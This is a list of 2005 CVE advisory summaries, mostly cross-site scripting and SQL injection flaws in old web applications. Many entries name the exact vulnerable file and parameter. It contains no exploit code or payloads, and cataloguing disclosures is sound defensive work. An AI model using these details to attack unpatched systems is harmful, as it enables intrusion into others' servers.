[CVE-2005-3695] Cross-site scripting (XSS) vulnerability in admin/config/confMgr.php in LiteSpeed Web Server 2.1.5 allows remote attackers to inject arbitrary web script or HTML via the m parameter.
[CVE-2005-3693] The AxWebRemoveCtrl ActiveX control for uninstalling the SunnComm MediaMax DRM allows remote attackers to download and execute arbitrary code, a similar vulnerability to CVE-2005-3650.
[CVE-2005-3692] Cross-site scripting (XSS) vulnerability in AMAX Magic Winmail Server 4.2 (build 0824) and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) retid parameter in badlogin.php, (2) Content-Type headers in HTML mails, and (3) HTML mail attachments.
[CVE-2005-3688] Cross-site scripting (XSS) vulnerability in members.php in XMB 1.9.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the "Your Current Mood" field in the registration page.
[CVE-2005-3685] Cross-site scripting (XSS) vulnerability in shopadmin.asp in VP-ASP Shopping Cart 5.50 allows remote attackers to inject arbitrary web script or HTML via the UserName parameter.
[CVE-2005-3676] SQL injection vulnerability in download.php in PhpWebThings 1.4.4 allows remote attackers to execute arbitrary SQL commands via the file parameter.
[CVE-2005-3665] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin before 2.7.0 allow remote attackers to inject arbitrary web script or HTML via the (1) HTTP_HOST variable and (2) various scripts in the libraries directory that handle header generation.
[CVE-2005-3638] Cross-site scripting (XSS) vulnerabilities in Ekinboard 1.0.3 allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter in profile.php and (2) titles of posts.
[CVE-2005-3636] Cross-site scripting (XSS) vulnerability in SAP Web Application Server (WAS) 6.10 allows remote attackers to inject arbitrary web script or HTML via Error Pages.
[CVE-2005-3635] Multiple cross-site scripting (XSS) vulnerabilities in SAP Web Application Server (WAS) 6.10 through 7.00 allow remote attackers to inject arbitrary web script or HTML via (1) the sap-syscmd in sap-syscmd and (2) the BspApplication field in the SYSTEM PUBLIC test application.
[CVE-2005-3634] frameset.htm in the BSP runtime in SAP Web Application Server (WAS) 6.10 through 7.00 allows remote attackers to log users out and redirect them to arbitrary web sites via a close command in the sap-sessioncmd parameter and a URL in the sap-exiturl parameter.
[CVE-2005-3633] HTTP response splitting vulnerability in frameset.htm in SAP Web Application Server (WAS) 6.10 through 7.00 allows remote attackers to inject arbitrary HTML headers via the sap-exiturl parameter.
[CVE-2005-3618] Cross-site request forgery (CSRF) vulnerability in the management interface for VMware ESX Server 2.0.x before 2.0.2 patch 1, 2.1.x before 2.1.3 patch 1, and 2.x before 2.5.3 patch 2 allows remote attackers to perform unauthorized actions as the administrator via URLs, as demonstrated using the setUsr operation to change a password. NOTE: this issue can be leveraged with CVE-2005-3619 to automatically perform the attacks.
[CVE-2005-3585] SQL injection vulnerability in forum.php in PhpWebThings 1.4.4 allows remote attackers to execute arbitrary SQL commands via the forum parameter.
[CVE-2005-3584] Cross-site scripting (XSS) vulnerability in forum.php in PhpWebThings 1.4.4 allows remote attackers to inject arbitrary web script or HTML via the forum parameter.
[CVE-2005-3577] Cross-site scripting vulnerability (XSS) in ts.exe (aka ts.cgi) in Walla TeleSite 3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the sug parameter.
[CVE-2005-3570] Unspecified cross-site scripting (XSS) vulnerability in Horde before 2.2.9 allows remote attackers to inject arbitrary web script or HTML via "not properly escaped error messages".
[CVE-2005-3556] Multiple cross-site scripting (XSS) vulnerabilities in PHPlist 2.10.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) listname parameter in (a) admin/editlist.php, (2) title parameter in (b) admin/spageedit.php, (3) title field in (c) admin/template.php, (4) filter, (5) delete, and (6) start parameters in (d) admin/eventlog.php, (7) id parameter in (e) admin/configure.php, (8) find parameter in (f) admin/users.php, (9) start parameter in (g) admin/admin.php, and (10) action parameter in (h) admin/fckphplist.php.
[CVE-2005-3552] Multiple cross-site scripting (XSS) vulnerabilities in PHPKIT 1.6.1 R2 and earlier allow remote attackers to inject arbitrary web script or HTML via multiple vectors in (1) login/profile.php, (2) login/userinfo.php, (3) admin/admin.php, (4) imcenter.php, and the (5) referer statistics, the (6) HTML title element and (7) logo alt attributes in forum postings, and the (8) Homepage field in the Guestbook.
[CVE-2005-3551] toendaCMS before 0.6.2 stores user account and session data in the web root directory, which allows remote attackers to obtain sensitive information via a direct request to the appropriate XML file.
[CVE-2005-3547] Cross-site scripting (XSS) vulnerability in Invision Power Board 2.1 allows remote attackers to inject arbitrary web script or HTML via the (1) adsess, (2) name, and (3) description parameters in admin.php, and the (4) ACP Notes, (5) Member Name, (6) Password, (7) Email Address, (8) Components, and multiple other input fields.
[CVE-2005-3544] Cross-site scripting (XSS) vulnerability in u2u.php in XMB 1.9.3 allows remote attackers to inject arbitrary web script or HTML via the username parameter.
[CVE-2005-3530] Cross-site scripting (XSS) vulnerability in Antville 1.1 allows remote attackers to inject arbitrary web script or HTML via the notfound.skin error document.
[CVE-2005-3528] Cross-site scripting (XSS) vulnerability in tiki-view_forum_thread.php in TikiWiki 1.9.0 through 1.9.2 allows remote attackers to inject arbitrary web script or HTML via the topics_offset parameter.
[CVE-2005-3522] Cross-site scripting (XSS) vulnerability in index.jsp in ManageEngine Netflow Analyzer 4.0.2 allows remote attackers to inject arbitrary web script or HTML via the grDisp parameter.
[CVE-2005-3520] Multiple cross-site scripting (XSS) vulnerabilities in MySource 2.14.0 allow remote attackers to inject arbitrary web script or HTML via (1) the target_url parameter in upgrade_in_progress_backend.php, (2) the stylesheet parameter in edit_table_cell_type_wysiwyg.php, and the bgcolor parameter in (3) insert_table.php, (4) edit_table_cell_props.php, (5) header.php, (6) edit_table_row_props.php, and (7) edit_table_props.php.
[CVE-2005-3516] Cross-site scripting (XSS) vulnerability in recommend.php in Chipmunk Directory script allows remote attackers to inject arbitrary web script or HTML via the entryID parameter.
[CVE-2005-3515] Cross-site scripting (XSS) vulnerability in recommend.php in Chipmunk Topsites script allows remote attackers to inject arbitrary web script or HTML via the ID parameter.
[CVE-2005-3514] Multiple cross-site scripting (XSS) vulnerabilities in Chipmunk Forum script allow remote attackers to inject arbitrary web script or HTML via the forumID parameter to (1) newtopic.php, (2) quote.php, (3) index.php, and (4) reply.php.
[CVE-2005-3512] Cross-site scripting (XSS) vulnerability in index.php in VUBB alpha rc1 allows remote attackers to inject arbitrary web script or HTML via the t parameter in a newreply action.
[CVE-2005-3511] Multiple cross-site scripting (XSS) vulnerabilities in Spymac Web OS 4.0 allow remote attackers to inject arbitrary web script or HTML via (a) the blogs module, including the (1) curr parameter in index.php, (2) inspire, (3) system, or (4) title parameter in blog_newentry.php, (5) entry parameter in blog_newentry_comment.php, (6) entry parameter in blog_edit_entry.php, or (7) caldate parameter in blog.php.
[CVE-2005-3510] Apache Tomcat 5.5.0 to 5.5.11 allows remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous requests to list a web directory that has a large number of files.
[CVE-2005-3506] Cross-site scripting (XSS) vulnerability in proxy.asp in Sambar Server 6.3 BETA 2 and possibly earlier versions allows remote attackers to inject arbitrary web script or HTML via the (1) Remote Proxy Server or (2) Proxy Filter IPs field.
[CVE-2005-3505] Cross-site scripting (XSS) vulnerability in the Entropy Chat script in cPanel 10.2.0-R82 and 10.6.0-R137 allows remote attackers to inject arbitrary web script or HTML via a chat message containing Javascript in style attributes in tags such as <b>, which are processed by Internet Explorer.
[CVE-2005-3498] IBM WebSphere Application Server 5.0.x before 5.02.15, 5.1.x before 5.1.1.8, and 6.x before fixpack V6.0.2.5, when session trace is enabled, records a full URL including the queryString in the trace logs when an application encodes a URL, which could allow attackers to obtain sensitive information.
[CVE-2005-3496] Cross-site scripting (XSS) vulnerability in PHP Handicapper allows remote attackers to inject arbitrary web script or HTML via the msg parameter to msg.php. NOTE: some sources identify a second vector in the login parameter to process_signup.php, but the original source says that it is for CRLF injection (CVE-2005-4712). Also note: the vendor has disputed CVE-2005-3497, and it is possible that the dispute was intended to include this issue as well. If so, followup investigation strongly suggests that the original report is correct.
[CVE-2005-3494] Cross-site scripting (XSS) vulnerability in Ar-blog 5.2 and earlier allows remote attackers to inject arbitrary web script or HTML via a blog comment.
[CVE-2005-3490] Directory traversal vulnerability in the web server in Asus Video Security 3.5.0.0 and earlier allows remote attackers to read arbitrary files via "../" or "..\" sequences in the URL.
[CVE-2005-3479] Cross-site scripting (XSS) vulnerability in login.asp in Ringtail CaseBook 6.1.0 allows remote attackers to inject arbitrary web script or HTML via the users parameter.
[CVE-2005-3475] Hasbani Web Server (WindWeb) 2.0 allows remote attackers to cause a denial of service (infinite loop) via HTTP crafted GET requests.
[CVE-2005-3473] Multiple cross-site scripting (XSS) vulnerabilities in Simple PHP Blog 0.4.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) entry, (2) blog_subject, and (3) blog_text parameters (involving the temp_subject variable) in (a) preview_cgi.php and (b) preview_static_cgi.php, or (4) scheme_name parameter and (5) bg_color parameters (involving the preset_name and result variables) in (c) colors.php.
[CVE-2005-3468] Directory traversal vulnerability in F-Secure Anti-Virus for Microsoft Exchange 6.40 and Internet Gatekeeper 6.40 to 6.42 allows limited remote attackers to bypass Web Console authentication and read files.
[CVE-2005-3453] Multiple unspecified vulnerabilities in Web Cache in Oracle Application Server 1.0 up to 10.1.2.0 have unknown impact and attack vectors, as identified by Oracle Vuln# (1) AS12 and (2) AS14.
[CVE-2005-3452] Unspecified vulnerability in Web Cache in Oracle Application Server 1.0 up to 9.0.4.2 has unknown impact and attack vectors, as identified by Oracle Vuln# AS13.
[CVE-2005-3449] Multiple unspecified vulnerabilities in Oracle Application Server 9.0 up to 10.1.2.0 have unknown impact and attack vectors, as identified by Oracle Vuln# (1) AS02 in Containers for J2EE, (2) AS07 in Internet Directory, (3) AS09 in Report Server, and (4) AS11 in Web Cache.
[CVE-2005-3444] Multiple unspecified vulnerabilities in the Programmatic Interface in Oracle Database Server from 8i up to 9.2.0.5 have unknown impact and attack vectors, aka Oracle Vuln# DB26.
[CVE-2005-3436] Cross-site scripting (XSS) vulnerability in Nuked-Klan 1.7 allows remote attackers to inject arbitrary web script or HTML via the (1) Search module, (2) certain edit fields in Guestbook, (3) the title in the Forum module, and (4) Textbox.
[CVE-2005-3434] Archilles Newsworld before 1.5.0-rc1 stores (1) account.nwd and (2) session.nwd under the web root with insufficient access control, which allows remote attackers to obtain sensitive information such as usernames, hashed passwords, and session IDs, and gain privileges.
[CVE-2005-3428] Cross-site scripting (XSS) vulnerability in Rockliffe MailSite Express before 6.1.22 allows remote attackers to inject arbitrary web script or HTML via a message body.
[CVE-2005-3425] Cross-site scripting (XSS) vulnerability in GNUMP3D before 2.9.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2005-3424.
[CVE-2005-3424] Cross-site scripting (XSS) vulnerability in GNUMP3D before 2.9.5 allows remote attackers to inject arbitrary web script or HTML via 404 error pages, a different vulnerability than CVE-2005-3425.
[CVE-2005-3422] Cross-site scripting (XSS) vulnerability in error.asp in ASP Fast Forum allows remote attackers to inject arbitrary web script or HTML via the error parameter.
[CVE-2005-3418] Multiple cross-site scripting (XSS) vulnerabilities in phpBB 2.0.17 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) error_msg parameter to usercp_register.php, (2) forward_page parameter to login.php, and (3) list_cat parameter to search.php, which are not initialized as variables.
[CVE-2005-3414] eyeOS 0.8.4 stores usrinfo.xml under the web document root with insufficient access control, which allows remote attackers to obtain user credentials.
[CVE-2005-3413] Cross-site scripting (XSS) vulnerability in desktop.php in eyeOS 0.8.4 allows remote attackers to inject arbitrary web script or HTML via the motd parameter.
[CVE-2005-3412] Cross-site scripting (XSS) vulnerability in Elite Forum 1.0.0.0 allows remote attackers to inject arbitrary web script or HTML via a Post Reply to a topic, in which the reply contains a javascript: URL in an <img> tag.
[CVE-2005-3411] Cross-site scripting (XSS) vulnerability in post.asp in Snitz Forums 2000 3.4.05 allows remote attackers to inject arbitrary web script or HTML via the type parameter in a Topic method.
[CVE-2005-3406] Cross-site scripting (XSS) vulnerability in phpESP 1.7.5 and earlier allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2005-3403] Multiple cross-site scripting (XSS) vulnerabilities in ATutor 1.4.1 through 1.5.1-pl1 allow remote attackers to inject arbitrary web script or HTML via (1) the _base_href parameter in translate.php, (2) the _base_path parameter in news.inc.php, and (3) the p parameter in add_note.php.
[CVE-2005-3398] The default configuration of the web server for the Solaris Management Console (SMC) in Solaris 8, 9, and 10 enables the HTTP TRACE method, which could allow remote attackers to obtain sensitive information such as cookies and authentication data from HTTP headers.
[CVE-2005-3397] Cross-site scripting (XSS) vulnerability in Comersus BackOffice allows remote attackers to inject arbitrary web script or HTML via the error parameter to comersus_backoffice_supportError.asp. NOTE: the comersus_backoffice_message.asp/message vector is already covered by CVE-2005-2191 item 2.
[CVE-2005-3388] Cross-site scripting (XSS) vulnerability in the phpinfo function in PHP 4.x up to 4.4.0 and 5.x up to 5.0.5 allows remote attackers to inject arbitrary web script or HTML via a crafted URL with a "stacked array assignment."
[CVE-2005-3386] SQL injection vulnerability in Techno Dreams Web Directory script allows remote attackers to execute arbitrary SQL commands and bypass authentication via the userid parameter in admin/login.asp.
[CVE-2005-3373] Multiple interpretation error in Dr.Web 4.32b allows remote attackers to bypass virus scanning via a file such as BAT, HTML, and EML with an "MZ" magic byte sequence which is normally associated with EXE, which causes the file to be treated as a safe type that could still be executed as a dangerous file type by applications on the end system, as demonstrated by a "triple headed" program that contains EXE, EML, and HTML content, aka the "magic byte bug."
[CVE-2005-3368] Cross-site scripting (XSS) vulnerability in the Search_Enhanced module in PHP-Nuke 7.9 allows remote attackers to inject arbitrary web script or HTML via the query parameter.
[CVE-2005-3367] Cross-site scripting (XSS) vulnerability in journal.php in SparkleBlog 2.1 allows remote attackers to inject arbitrary web script or HTML via the name field.
[CVE-2005-3361] Cross-site scripting (XSS) vulnerability in forum/index.php in FlatNuke 2.5.6 allows remote attackers to inject arbitrary web script or HTML via the nome parameter in a login operation, a variant of CVE-2005-3306.
[CVE-2005-3352] Cross-site scripting (XSS) vulnerability in the mod_imap module of Apache httpd before 1.3.35-dev and Apache httpd 2.0.x before 2.0.56-dev allows remote attackers to inject arbitrary web script or HTML via the Referer when using image maps.
[CVE-2005-3348] HTTP response splitting vulnerability in index.php in phpSysInfo 2.4 and earlier, as used in phpgroupware 0.9.16 and earlier, and egroupware before 1.0.0.009, allows remote attackers to spoof web content and poison web caches via CRLF sequences in the charset parameter.
[CVE-2005-3342] noweb 2.10c and earlier allows local users to overwrite arbitrary files via symlink attacks on temporary files in (1) lib/toascii.nw and (2) shell/roff.mm.
[CVE-2005-3337] Multiple cross-site scripting (XSS) vulnerabilities in Mantis before 0.19.3 allow remote attackers to inject arbitrary web script or HTML via (1) unknown vectors involving Javascript and (2) mantis/view_all_set.php.
[CVE-2005-3334] Cross-site scripting (XSS) vulnerability in index.php in Flyspray 0.9.7 through 0.9.8 (devel) allows remote attackers to inject arbitrary web script or HTML via the (1) PHPSESSID, (2) task, (3) string, (4) type, (5) serv, (6) due, (7) dev, and (8) sort2 parameters.
[CVE-2005-3333] SQL injection vulnerability in eBASEweb 3.0 allows remote attackers to execute arbitrary SQL commands via unknown attack vectors.
[CVE-2005-3330] The _httpsrequest function in Snoopy 1.2, as used in products such as (1) MagpieRSS, (2) WordPress, (3) Ampache, and (4) Jinzora, allows remote attackers to execute arbitrary commands via shell metacharacters in an HTTPS URL to an SSL protected web page, which is not properly handled by the fetch function.
[CVE-2005-3329] Cross-site scripting (XSS) vulnerability in RSA Authentication Agent for Web 5.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the image parameter in a GetPic operation.
[CVE-2005-3320] Cross-site scripting (XSS) vulnerability in SiteTurn Domain Manager Pro allows remote attackers to inject arbitrary web script or HTML via the err parameter in the panel script.
[CVE-2005-3316] The installation of ON Symantec Discovery 4.5.x and Symantec Discovery 6.0 creates the (1) DiscoveryWeb and (2) DiscoveryRO database accounts with null passwords, which could allow attackers to gain privileges or prevent Discovery from running by setting another password.
[CVE-2005-3312] The HTML rendering engine in Microsoft Internet Explorer 6.0 allows remote attackers to conduct cross-site scripting (XSS) attacks via HTML in corrupted images and other files such as .GIF, JPG, and WAV, which is rendered as HTML when the user clicks on the link, even though the web server response and file extension indicate that it should be treated as a different file type.
[CVE-2005-3310] Interpretation conflict in phpBB 2.0.17, with remote avatars and avatar uploading enabled, allows remote authenticated users to inject arbitrary web script or HTML via an HTML file with a GIF or JPEG file extension, which causes the HTML to be executed by a victim who views the file in Internet Explorer, which renders malformed image types as HTML, enabling cross-site scripting (XSS) attacks. NOTE: it could be argued that this vulnerability is due to a design flaw in Internet Explorer (CVE-2005-3312) and the proper fix should be in that browser.
[CVE-2005-3308] Multiple cross-site scripting (XSS) vulnerabilities in Zomplog 3.4 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) comment parameter in detail.php, (3) the username parameter in get.php, and (4) the search parameter in index.php.
[CVE-2005-3306] Cross-site scripting (XSS) vulnerability in index.php for FlatNuke 2.5.6 allows remote attackers to inject arbitrary web script or HTML via the user parameter in a profile operation, a different vulnerability than CVE-2005-2814. NOTE: it is possible that this XSS is a resultant vulnerability of CVE-2005-3307.
[CVE-2005-3304] Multiple SQL injection vulnerabilities in PHP-Nuke 7.8 allow remote attackers to modify SQL queries and execute arbitrary PHP code via (1) the username parameter in the Your Account page, (2) the url parameter in the Downloads module, and (3) the description parameter in the Web_Links module.
[CVE-2005-3301] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin before 2.6.4-pl3 allow remote attackers to inject arbitrary web script or HTML via certain arguments to (1) left.php, (2) queryframe.php, or (3) server_databases.php.
[CVE-2005-3292] Multiple cross-site scripting (XSS) vulnerabilities in Xeobook 0.93 allow remote attackers to inject arbitrary web script or HTML via Javascript events in tags such as <b>.
[CVE-2005-3285] Cross-site scripting (XSS) vulnerability in comersus_backoffice_searchItemForm.asp in Comersus BackOffice Plus allows remote attackers to inject arbitrary web script or HTML via the (1) forwardTo1, (2) forwardTo2, (3) nameFT1, or (4) nameFT2 parameters.
[CVE-2005-3283] Cross-site scripting (XSS) vulnerability in TikiWiki before 1.9.1.1 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2005-3269] Stack-based buffer overflow in help.cgi in the HTTP administrative interface for (1) Sun Java System Directory Server 5.2 2003Q4, 2004Q2, and 2005Q1, (2) Red Hat Directory Server and (3) Certificate Server before 7.1 SP1, (4) Sun ONE Directory Server 5.1 SP4 and earlier, and (5) Sun ONE Administration Server 5.2 allows remote attackers to cause a denial of service (admin server crash), or local users to gain root privileges.
[CVE-2005-3264] Cross-site scripting (XSS) vulnerability in thread.php for Zeroblog 1.1f and 1.2a allows remote attackers to inject arbitrary web script or HTML via the threadID parameter.
[CVE-2005-3260] Multiple cross-site scripting (XSS) vulnerabilities in versatileBulletinBoard (vBB) 1.0.0 RC2 allow remote attackers to inject arbitrary web script or HTML via (1) the url parameter in dereferrer.php and (2) the file parameter in imagewin.php.
[CVE-2005-3255] The (1) cgiwrap and (2) php-cgiwrap packages before 3.9 in Debian GNU/Linux provide access to debugging CGIs under the web document root, which allows remote attackers to obtain sensitive information via direct requests to those CGIs.
[CVE-2005-3237] Cross-site scripting (XSS) vulnerability in Cyphor 0.19 allows remote attackers to inject arbitrary web script or HTML via the t_login parameter of footer.php.
[CVE-2005-3218] Multiple interpretation error in unspecified versions of Dr.Web Antivirus allows remote attackers to bypass virus detection via a malicious executable in a specially crafted RAR file with malformed central and local headers, which can still be opened by products such as Winrar and PowerZip, even though they are rejected as corrupted by Winzip and BitZipper.
[CVE-2005-3205] Cross-site scripting (XSS) vulnerability in iSQL*Plus (iSQLPlus) in Oracle9i Database Server Release 2 9.0.2.4 allows remote attackers to inject arbitrary web script or HTML via script in the "set markup HTML TABLE" command, which is executed when the user selects a table.
[CVE-2005-3204] Cross-site scripting (XSS) vulnerability in Oracle XML DB 9iR2 allows remote attackers to inject arbitrary web script or HTML via the query string in an HTTP request.
[CVE-2005-3202] Multiple cross-site scripting (XSS) vulnerabilities in Oracle HTML DB (HTMLDB) 1.3 through 1.3.6 allow remote attackers to inject arbitrary web script or HTML, and subsequently execute SQL statements via the (1) p or (2) p_t02 parameters.
[CVE-2005-3200] Multiple cross-site scripting (XSS) vulnerabilities in Utopia News Pro (UNP) 1.1.3 and 1.1.4 allow remote attackers to inject arbitrary web script or HTML via (1) the sitetitle parameter in header.php and (2) the version and (3) query_count parameters in footer.php.
[CVE-2005-3198] Webroot Desktop Firewall before 1.3.0build52 allows local users to disable the firewall, even when password protection is enabled, via certain DeviceIoControl commands.
[CVE-2005-3197] Stack-based buffer overflow in PWIWrapper.dll for Webroot Desktop Firewall before 1.3.0build52 allows local users to execute arbitrary code as SYSTEM by sending a crafted DeviceIoControl command, then removing an allowed program from the firewall list.
[CVE-2005-3182] Buffer overflow in the HTTP management interface for GFI MailSecurity 8.1 allows remote attackers to execute arbitrary code via long headers such as (1) Host and (2) Accept in HTTP requests. NOTE: the vendor suggests that this issue is "in an underlying Microsoft technology" which, if true, could mean that the overflow affects other products as well.
[CVE-2005-3165] Multiple cross-site scripting (XSS) vulnerabilities in MediaWiki before 1.4.9 allow remote attackers to inject arbitrary web script or HTML via (1) <math> tags or (2) Extension or <nowiki> sections that "bypass HTML style attribute restrictions" that are intended to protect against XSS vulnerabilities in Internet Explorer clients.
[CVE-2005-3163] Unspecified vulnerability in Polipo 0.9.8 and earlier allows attackers to read files outside of the web root.
[CVE-2005-3152] Multiple cross-site scripting (XSS) vulnerabilities in CubeCart 3.0.3 allow remote attackers to inject arbitrary web script or HTML via the redir parameter to (1) cart.php or (2) index.php, or (3) the searchStr parameter in a viewCat action to index.php. Note: vectors (1) and (2) were later reported to affect 3.0.7-pl1.
[CVE-2005-3143] Unspecified vulnerability in the Mailbox Server for 4D WebStar before 5.3.5 allows attackers to cause a denial of service (crash) via IMAP clients on Mac OS X 10.4 Mail 2.
[CVE-2005-3136] Directory traversal vulnerability in Virtools Web Player 3.0.0.100 and earlier allows remote attackers to overwrite arbitrary files via a .. (dot dot) in a filename.
[CVE-2005-3135] Buffer overflow in Virtools Web Player 3.0.0.100 and earlier allows remote attackers to execute arbitrary code via a long filename.
[CVE-2005-3133] Multiple directory traversal vulnerabilities in MERAK Mail Server 8.2.4r with Icewarp Web Mail 5.5.1, and possibly earlier versions, allow remote attackers to (1) delete arbitrary files or directories via a relative path to the id parameter to logout.html or (2) include arbitrary PHP files or other files via the helpid parameter to help.html.
[CVE-2005-3132] MERAK Mail Server 8.2.4r with Icewarp Web Mail 5.5.1, and possibly earlier versions, allows remote attackers to obtain sensitive information via a direct request to bwlist_inc.html, which reveals the path in an error message.
[CVE-2005-3131] Multiple cross-site scripting (XSS) vulnerabilities in MERAK Mail Server 8.2.4r with Icewarp Web Mail 5.5.1, and possibly earlier versions, allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to blank.html, or the createdataCX parameter to (2) calendar_d.html, (3) calendar_m.html, or (4) calendar_w.html.
[CVE-2005-3128] Cross-site scripting (XSS) vulnerability in add.php in Address Add Plugin 1.9 and 2.0 for Squirrelmail allows remote attackers to inject arbitrary web script or HTML via the IMG tag.
[CVE-2005-3127] Cross-site scripting (XSS) vulnerability in index.php in lucidCMS 1.0.11 allows remote attackers to inject arbitrary web script or HTML via the query string.
[CVE-2005-3104] mt-comments.cgi in Movable Type before 3.2 allows attackers to redirect users to other web sites via URLs in comments.
[CVE-2005-3103] Cross-site scripting (XSS) vulnerability in Movable Type before 3.2 allows remote attackers to inject arbitrary web script or HTML via the (1) title, (2) category, (3) body, (4) extended body, and (5) excerpt form fields in new blog entries.
[CVE-2005-3091] Cross-site scripting (XSS) vulnerability in Mantis before 1.0.0rc1 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors, as identified by bug#0005751 "thraxisp".
[CVE-2005-3090] Cross-site scripting (XSS) vulnerability in bug_actiongroup_page.php in Mantis 0.19.0a1 through 1.0.0a3 allows remote attackers to inject arbitrary web script or HTML via the summary of the bug, which is not quoted when view_all_bug_page.php is used to delete the bug, as identified by bug#0006002, a different vulnerability than CVE-2005-2557.
[CVE-2005-3086] Directory traversal vulnerability in admin/about.php in contentServ 3.1 allows remote attackers to read or include arbitrary files via ".." sequences in the ctsWebsite parameter.
[CVE-2005-3085] Multiple cross-site scripting (XSS) vulnerabilities in rss.php in Riverdark Studios RSS Syndicator module 2.1.7 allow remote attackers to inject arbitrary web script or HTML via the (1) forum or (2) topic parameters.
[CVE-2005-3083] Cross-site scripting (XSS) vulnerability in index.php in CMS Made Simple 0.10 allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2005-3078] Cross-site scripting (XSS) vulnerability in PunBB before 1.2.8 allows remote attackers to inject arbitrary web script or HTML via the "forgotten e-mail" feature.
[CVE-2005-3077] Microsoft Internet Explorer 5.2.3 for Mac OS allows remote attackers to cause a denial of service (crash) via a web page with malformed attributes in a BGSOUND tag, possibly involving double-quotes in an about: URI.
[CVE-2005-3067] Cross-site scripting (XSS) vulnerability in perldiver.cgi in PerlDiver 2.x allows remote attackers to inject arbitrary web script or HTML via the module parameter.
[CVE-2005-3066] Cross-site scripting (XSS) vulnerability in perldiver.pl in PerlDiver 1.x allows remote attackers to inject arbitrary web script or HTML via the query string. NOTE: this issue was originally disputed by the vendor, but it has since been acknowledged.
[CVE-2005-3058] Interpretation conflict in Fortinet FortiGate 2.8, running FortiOS 2.8MR10 and v3beta, allows remote attackers to bypass the URL blocker via an (1) HTTP request terminated with a line feed (LF) and not carriage return line feed (CRLF) or (2) HTTP request with no Host field, which is still processed by most web servers without violating RFC2616.
[CVE-2005-3049] PhpMyFaq 1.5.1 stores data files under the web document root with insufficient access control and predictable filenames, which allows remote attackers to obtain sensitive information via a direct request to the data/tracking[DATE] file.
[CVE-2005-3047] Multiple cross-site scripting (XSS) vulnerabilities in PhpMyFaq 1.5.1 allow remote attackers to inject arbitrary web script or HTML via the (1) PMF_CONF[version] parameter to footer.php or (2) PMF_LANG[metaLanguage] to header.php.
[CVE-2005-3042] miniserv.pl in Webmin before 1.230 and Usermin before 1.160, when "full PAM conversations" is enabled, allows remote attackers to bypass authentication by spoofing session IDs via certain metacharacters (line feed or carriage return).
[CVE-2005-3041] Unspecified "drag-and-drop vulnerability" in Opera Web Browser before 8.50 on Windows allows "unintentional file uploads."
[CVE-2005-3037] Cross-site scripting (XSS) vulnerability in Handy Address Book Server 1.1 allows remote attackers to inject arbitrary web script or HTML via the SEARCHTEXT parameter in a demos URL.
[CVE-2005-3033] Stack-based buffer overflow in vxWeb 1.1.4 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP GET request.
[CVE-2005-3025] Multiple cross-site scripting (XSS) vulnerabilities in vBulletin 3.0.7 and earlier allow remote attackers to inject arbitrary web script or HTML via the loc parameter to (1) modcp/index.php or (2) admincp/index.php, or the ip parameter to (3) modcp/user.php or (4) admincp/usertitle.php.
[CVE-2005-3023] Multiple cross-site scripting (XSS) vulnerabilities in vBulletin 3.0.9 and earlier allow remote attackers to inject arbitrary web script or HTML via certain arguments to (1) announcement.php, (2) admincalendar.php, (3) bbcode.php, (4) cronadmin.php, (5) email.php, (6) faq.php, (7) forum.php, (8) image.php, (9) language.php, (10) ranks.php, (11) replacement.php, (12) replacement.php, (13) template.php, (14) template.php, (15) usergroup.php, or (16) usertitle.php.
[CVE-2005-3020] Multiple cross-site scripting (XSS) vulnerabilities in vBulletin before 3.0.9 allow remote attackers to inject arbitrary web script or HTML via the (1) group parameter to css.php, (2) redirect parameter to index.php, (3) email parameter to user.php, (4) goto parameter to language.php, (5) orderby parameter to modlog.php, and the (6) hex, (7) rgb, or (8) expandset parameter to template.php.
[CVE-2005-3017] PHP file inclusion vulnerability in index.php in Content2Web 1.0.1 allows remote attackers to include arbitrary files via the show parameter, which can lead to resultant errors such as path disclosure, SQL error messages, and cross-site scripting (XSS).
[CVE-2005-3015] Cross-site scripting (XSS) vulnerability in IBM Lotus Domino 6.5.2 allows remote attackers to inject arbitrary web script or HTML via the (1) BaseTarget or (2) Src parameters.
[CVE-2005-3014] Cross-site scripting (XSS) vulnerability in Ensim webplliance allows remote attackers to inject arbitrary web script or HTML via the Login (OCW_login_username) field.
[CVE-2005-3009] Cross-site scripting (XSS) vulnerability in CuteNews allows remote attackers to inject arbitrary web script or HTML via the mod parameter to index.php.
[CVE-2005-3006] The mail client in Opera before 8.50 opens attached files from the user's cache directory without warning the user, which might allow remote attackers to inject arbitrary web script and spoof attachment filenames.
[CVE-2005-3000] Multiple cross-site scripting (XSS) vulnerabilities in viewers/txt.php in PHP Advanced Transfer Manager 1.30 allow remote attackers to inject arbitrary web script or HTML via the (1) font, (2) normalfontcolor, or (3) mess[31] parameters.
[CVE-2005-2994] Unspecified vulnerability in the web client for IBM Rational ClearQuest 2002.05.00 and 2002.05.20, and 2003.06.00 through 2003.06.15 before SR5, allows remote attackers to execute XML Style Sheets (XSS).
[CVE-2005-2985] SQL injection vulnerability in search_result.php in AEwebworks aeDating Script 4.0 and earlier allows remote attackers to execute arbitrary SQL statements via the Country parameter.
[CVE-2005-2982] Cross-site scripting (XSS) vulnerability in CompaqHTTPServer 2.1 allows remote attackers to inject arbitrary web script or HTML via the URL, which is not properly quoted in the resulting 404 error page.
[CVE-2005-2981] Cross-site scripting (XSS) vulnerability in Orion 1.3.8 and 1.4.5 allows remote attackers to inject arbitrary web script or HTML via the URL, which is not properly quoted in the resulting 404 error page.
[CVE-2005-2980] Cross-site scripting (XSS) vulnerability in index.php in phpoutsourcing Noah's classifieds 1.3 allows remote attackers to inject arbitrary web script or HTML via the rollid parameter.
